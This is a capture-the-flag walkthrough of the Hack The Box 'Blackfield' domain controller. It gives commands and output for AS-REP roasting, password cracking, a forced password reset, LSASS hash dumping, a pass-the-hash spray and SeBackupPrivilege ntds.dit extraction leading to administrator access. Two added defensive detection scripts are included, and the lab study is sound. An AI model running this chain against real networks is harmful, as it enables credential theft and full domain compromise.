Port scanning

┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.192
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-19 22:57 CST
Nmap scan report for 10.10.10.192
Host is up (0.079s latency).
Not shown: 65525 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
593/tcp open http-rpc-epmap
3268/tcp open globalcatLDAP
5985/tcp open wsman
49677/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 21.11 seconds
┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ sudo nmap -sT -sC -sV -O -p53,88,135,139,389,445,593,3268,5985 10.10.10.192
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-19 22:59 CST
Nmap scan report for 10.10.10.192
Host is up (0.074s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-19 21:48:44Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-09-19T21:49:02
|_ start_date: N/A
|_clock-skew: 6h49m18s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.50 seconds

Add a hosts entry: black.local

Enum

LDAP enumeration fails because we have no permissions.

Enumerate the shares anonymously:

┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ smbmap -H 10.10.10.192 -u guest
[+] IP: 10.10.10.192:445 Name: blackfield.local Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic NO ACCESS Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
profiles$ READ ONLY
SYSVOL NO ACCESS Logon server share

Two shares are readable. Connecting to the profiles$ share reveals a pile of empty directories whose names look like usernames, so save them as a user wordlist.

┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ cat username|awk -F ' ' '{print $1}' >user.txt

Try GetNPUsers

┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ GetNPUsers.py blackfield.local/ -usersfile user.txt -no-pass -dc-ip 10.10.10.192 -request >NPresult

Among a string of errors, a hash turns up.

┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
#00^BlackKnight ($krb5asrep$23$support@BLACKFIELD.LOCAL)
1g 0:00:00:10 DONE (2024-09-19 23:55) 0.09842g/s 1410Kp/s 1410Kc/s 1410KC/s #1WHORE..#*bebe#*
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

That is the support user's password. WinRM login does not work with it, so back to SMB.
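Added here as a defender-side example (not code from the original writeup): detection logic for the AS-REP roasting step above. It reads Windows Security event 4768 records under assumed short field names and flags both the roastable account (TGT issued with no pre-authentication and RC4, the `$krb5asrep$23$` material john cracked) and the source that probed many non-existent names, which is what the "string of errors" from a username wordlist looks like on the DC; the sample records are constructed.

```python
# Added example, not part of the original writeup: detection logic for the
# AS-REP roasting step (GetNPUsers.py -no-pass -request) performed above.
# Input records mirror Windows Security event 4768 fields under assumed
# short keys; the sample records are constructed, not logs from the box.
from collections import defaultdict

PREAUTH_NONE = 0                   # Pre-Authentication Type 0: account has DONT_REQ_PREAUTH
ETYPE_RC4 = 0x17                   # Ticket Encryption Type 0x17: RC4-HMAC, etype 23 in $krb5asrep$23$
KDC_ERR_C_PRINCIPAL_UNKNOWN = 0x6  # Result Code 0x6: the requested account does not exist

def detect_asrep_roasting(events, enum_threshold=3):
    """Return (roastable, enumerators).

    roastable:   accounts that received an RC4 AS-REP without pre-authentication,
                 i.e. material that can be cracked offline exactly as john did above.
    enumerators: client IP -> sorted names that produced KDC_ERR_C_PRINCIPAL_UNKNOWN,
                 kept only for sources probing at least enum_threshold unknown names
                 (a username wordlist fed to GetNPUsers.py produces this noise).
    """
    roastable = set()
    unknown_by_ip = defaultdict(set)
    for ev in events:
        if ev["result"] == KDC_ERR_C_PRINCIPAL_UNKNOWN:
            unknown_by_ip[ev["client_ip"]].add(ev["account"])
        elif (ev["result"] == 0 and ev["preauth_type"] == PREAUTH_NONE
              and ev["etype"] == ETYPE_RC4):
            roastable.add(ev["account"])
    enumerators = {ip: sorted(names) for ip, names in unknown_by_ip.items()
                   if len(names) >= enum_threshold}
    return roastable, enumerators

# Constructed sample 4768 records: Account Name, Client Address,
# Pre-Authentication Type, Ticket Encryption Type, Result Code.
SAMPLE_4768 = [
    {"account": "support",    "client_ip": "10.10.14.5",  "preauth_type": 0, "etype": 0x17, "result": 0x0},
    {"account": "svc_backup", "client_ip": "10.10.10.50", "preauth_type": 2, "etype": 0x12, "result": 0x0},
    # pre-auth present: RC4 alone is weak crypto, not a roastable ticket
    {"account": "audit2020",  "client_ip": "10.10.10.50", "preauth_type": 2, "etype": 0x17, "result": 0x0},
    {"account": "jsmith",     "client_ip": "10.10.14.5",  "preauth_type": 0, "etype": 0x17, "result": 0x6},
    {"account": "jdoe",       "client_ip": "10.10.14.5",  "preauth_type": 0, "etype": 0x17, "result": 0x6},
    {"account": "mmiller",    "client_ip": "10.10.14.5",  "preauth_type": 0, "etype": 0x17, "result": 0x6},
]

if __name__ == "__main__":
    roastable, enumerators = detect_asrep_roasting(SAMPLE_4768)
    print("roastable accounts:", sorted(roastable))   # ['support']
    print("enumeration sources:", enumerators)
```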

┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ smbmap -H 10.10.10.192 -u support -p '#00^BlackKnight'
<SNIP>
[+] IP: 10.10.10.192:445 Name: blackfield.local Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic NO ACCESS Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
profiles$ READ ONLY
SYSVOL READ ONLY Logon server share

Connect to the SYSVOL share and download it recursively.

There is a Registry.pol, the registry part of a GPO policy, but it could not be put to use.

Use BloodHound to enumerate attack paths.

Installation

┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ sudo apt install bloodhound

┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ pip3 install bloodhound

Other initial setup follows: https://bloodhound.readthedocs.io/en/latest/installation/linux.html

┌──(mikannse㉿kali)-[~/HTB/blackfield/blood]
└─$ bloodhound-python -u support -p '#00^BlackKnight' -d blackfield.local -ns 10.10.10.192 -c DcOnly
INFO: Found AD domain: blackfield.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.blackfield.local:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 316 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 18 computers
INFO: Found 0 trusts
INFO: Done in 00M 18S

The collection produced several JSON files; start BloodHound.

┌──(mikannse㉿kali)-[~/HTB/blackfield/blood]
└─$ bloodhound --no-sandbox

Log in with the credentials set up in neo4j, then upload the data from the top-right corner. Searching for the support user in the top right displays the nodes related to it.

In the outbound list, the support user is found to be able to force a password change on the audit2020 user.

The password can be reset over RPC.

┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ rpcclient -U blackfield/support 10.10.10.192
Password for [BLACKFIELD\support]:
rpcclient $> setuserinfo audit2020 23 1q2w3e!

A new share is now readable.

┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ smbmap -H 10.10.10.192 -u audit2020 -p '1q2w3e!'
<SNIP>
[+] IP: 10.10.10.192:445 Name: blackfield.local Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic READ ONLY Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
profiles$ READ ONLY
SYSVOL READ ONLY Logon server share

Pypykatz

Connect to the forensic share; the interesting item is lsass.zip. The file is fairly large and the download timed out, so switch to impacket-smbclient: it still takes a while, but at least it does not time out.

┌──(mikannse㉿kali)-[~/HTB/blackfield/auditshare]
└─$ impacket-smbclient audit2020:'1q2w3e!'@10.10.10.192
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# use forensic
# cd memory_analysis
# get lsass.zip
# exit

After unzipping, use pypykatz to dump hashes from the LSASS dump, then turn the users and hashes into wordlists.

┌──(mikannse㉿kali)-[~/HTB/blackfield/auditshare]
└─$ cat lsa_dump|grep NT: |cut -d " " -f2 |sort -u >hash
┌──(mikannse㉿kali)-[~/HTB/blackfield/auditshare]
└─$ cat lsa_dump|grep Username: |sort -ru |cut -d " " -f2 |awk '$NF' >user
┌──(mikannse㉿kali)-[~/HTB/blackfield/auditshare]
└─$ crackmapexec smb 10.10.10.192 -u user -H hash --continue-on-success
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [-] BLACKFIELD.local\svc_backup:7f1e4ff8c6a8e6b6fcae2d9c0572cd62 STATUS_LOGON_FAILURE
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d
<SNIP>

Spray succeeded: svc_backup:9658d1d1dcd9250115e2205d9f48400d

┌──(mikannse㉿kali)-[~/HTB/blackfield/auditshare]
└─$ evil-winrm -i 10.10.10.192 -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami
blackfield\svc_backup

Privilege escalation

*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /all

USER INFORMATION
----------------

User Name SID
===================== ==============================================
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413


GROUP INFORMATION
-----------------

Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

SeBackupPrivilege is present, which allows reading arbitrary files.

Using: https://github.com/giuliano108/SeBackupPrivilege

I originally wanted to read root.txt directly, but there was no permission; notes.txt on the admin's desktop, however, can be read.

*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload SeBackupPrivilegeCmdLets.dll

Info: Uploading /home/mikannse/tools/Privesc/win/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dll to C:\Users\svc_backup\Documents\SeBackupPrivilegeCmdLets.dll

Data: 16384 bytes of 16384 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload SeBackupPrivilegeUtils.dll

Info: Uploading /home/mikannse/tools/Privesc/win/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeUtils.dll to C:\Users\svc_backup\Documents\SeBackupPrivilegeUtils.dll

Data: 21844 bytes of 21844 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Import-Module C:\Users\svc_backup\Documents\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Import-Module C:\Users\svc_backup\Documents\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\Administrator\Desktop> Copy-FileSeBackupPrivilege C:\Users\Administrator\Desktop\notes.txt C:\Users\svc_backup\Desktop\notes.txt

In short, it says root.txt has been encrypted; all in all, privilege escalation is still needed.

The common escalation path with SeBackupPrivilege is dumping NTDS to obtain the administrator's hash. Because this is a domain controller, ntds.dit can be dumped directly; otherwise the usual three hives would have to be dumped separately.

But to dump ntds.dit, reg will not do; diskshadow is needed.

Upload a text file to the machine:

┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ cat cmd
set context persistent nowriters
add volume c: alias temp
create
expose %temp% h:
exit

┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ unix2dos cmd
unix2dos: converting file cmd to DOS format..

The line endings need converting first, then upload it.

*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload cmd

Info: Uploading /home/mikannse/HTB/blackfield/cmd to C:\Users\svc_backup\Documents\cmd

Data: 120 bytes of 120 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc_backup\Documents> mv cmd C:\Windows\Temp
*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd C:\Windows\Temp
*Evil-WinRM* PS C:\Windows\Temp> diskshadow /s cmd
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 9/20/2024 3:56:35 AM

-> set context persistent nowriters
-> add volume c: alias temp
-> create
Alias temp for shadow ID {581f125e-ba6a-4553-a945-f2574bc04948} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {68e3a0ad-41ca-4044-bd06-0fbfefdc8c9f} set as environment variable.

Querying all shadow copies with the shadow copy set ID {68e3a0ad-41ca-4044-bd06-0fbfefdc8c9f}

* Shadow copy ID = {581f125e-ba6a-4553-a945-f2574bc04948} %temp%
- Shadow copy set: {68e3a0ad-41ca-4044-bd06-0fbfefdc8c9f} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 9/20/2024 3:56:36 AM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %temp% h:
-> %temp% = {581f125e-ba6a-4553-a945-f2574bc04948}
The shadow copy was successfully exposed as h:\.
-> exit

The DLL modules from earlier are needed again.

*Evil-WinRM* PS C:\Windows\Temp> Import-Module C:\Users\svc_backup\Documents\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Windows\Temp> Import-Module C:\Users\svc_backup\Documents\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Windows\Temp> Copy-FileSeBackupPrivilege h:\windows\ntds\ntds.dit c:\windows\temp\NTDS -Overwrite
*Evil-WinRM* PS C:\Windows\Temp> Copy-FileSeBackupPrivilege h:\windows\system32\config\SYSTEM c:\windows\temp\SYSTEM -Overwrite

Downloading through evil-winrm is too slow, so use an SMB share instead: start an SMB server locally.

┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ smbserver.py share . -smb2support
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ secretsdump.py -ntds ntds -system system LOCAL

The admin hash 184fb5e5178480be64824d4cd53b99ee is found in the output.

┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ evil-winrm -i 10.10.10.192 -u 'administrator' -H '184fb5e5178480be64824d4cd53b99ee'
*Evil-WinRM* PS C:\Users\Administrator\desktop> whoami
blackfield\administrator
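Added here as a defender-side example (not code from the writeup or from the SeBackupPrivilege project linked above): an audit check that parses `whoami /all` output and flags what the escalation chain above relied on, Backup Operators membership plus SeBackupPrivilege and SeRestorePrivilege, and calls out the domain controller case where that privilege exposes ntds.dit through a shadow copy. The column layout is assumed from the output shown above and the sample is an abridged, constructed copy of the svc_backup token.

```python
# Added example, not part of the original writeup: audit check over `whoami /all`
# output for the token shape that made the escalation above possible. Field
# layout is assumed from the output shown earlier; the sample is constructed.
import re

FILE_ACL_BYPASS_PRIVS = {"SeBackupPrivilege", "SeRestorePrivilege"}  # read/write any file, ACLs ignored
BACKUP_OPERATORS_SID = "S-1-5-32-551"                                 # well-known SID of BUILTIN\Backup Operators

def parse_whoami_all(text):
    """Return (group SIDs, enabled privilege names) parsed from `whoami /all` output."""
    groups, privs = set(), set()
    section = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.endswith("INFORMATION"):      # USER / GROUP / PRIVILEGES / USER CLAIMS headers
            section = stripped
        elif section == "GROUP INFORMATION":
            m = re.search(r"\b(S-1-[0-9-]+)\b", stripped)
            if m:
                groups.add(m.group(1))
        elif section == "PRIVILEGES INFORMATION":
            m = re.match(r"(Se\w+Privilege)\s.*\s(Enabled|Disabled)$", stripped)
            if m and m.group(2) == "Enabled":
                privs.add(m.group(1))
    return groups, privs

def backup_operator_findings(text, is_domain_controller):
    """List the findings a reviewer would raise for this token; an empty list means nothing of note."""
    groups, privs = parse_whoami_all(text)
    findings = []
    if BACKUP_OPERATORS_SID in groups:
        findings.append("member of BUILTIN\\Backup Operators")
    findings += [f"{p} enabled" for p in sorted(FILE_ACL_BYPASS_PRIVS & privs)]
    if is_domain_controller and "SeBackupPrivilege" in privs:
        findings.append("on a DC: ntds.dit and SYSTEM readable from a shadow copy, all domain hashes exposed")
    return findings

# Constructed sample, abridged from the svc_backup token shown above.
SAMPLE_WHOAMI = r"""USER INFORMATION
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413
GROUP INFORMATION
BUILTIN\Backup Operators        Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
SeBackupPrivilege   Back up files and directories Enabled
SeRestorePrivilege  Restore files and directories Enabled
SeShutdownPrivilege Shut down the system          Enabled
"""
```

Calling `backup_operator_findings(SAMPLE_WHOAMI, is_domain_controller=True)` returns four findings for this token; the same token on a member server returns three, and a token with only SeShutdownPrivilege returns none.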

Ramblings

This box is really awesome; I learned a whole lot. BloodHound is awesome.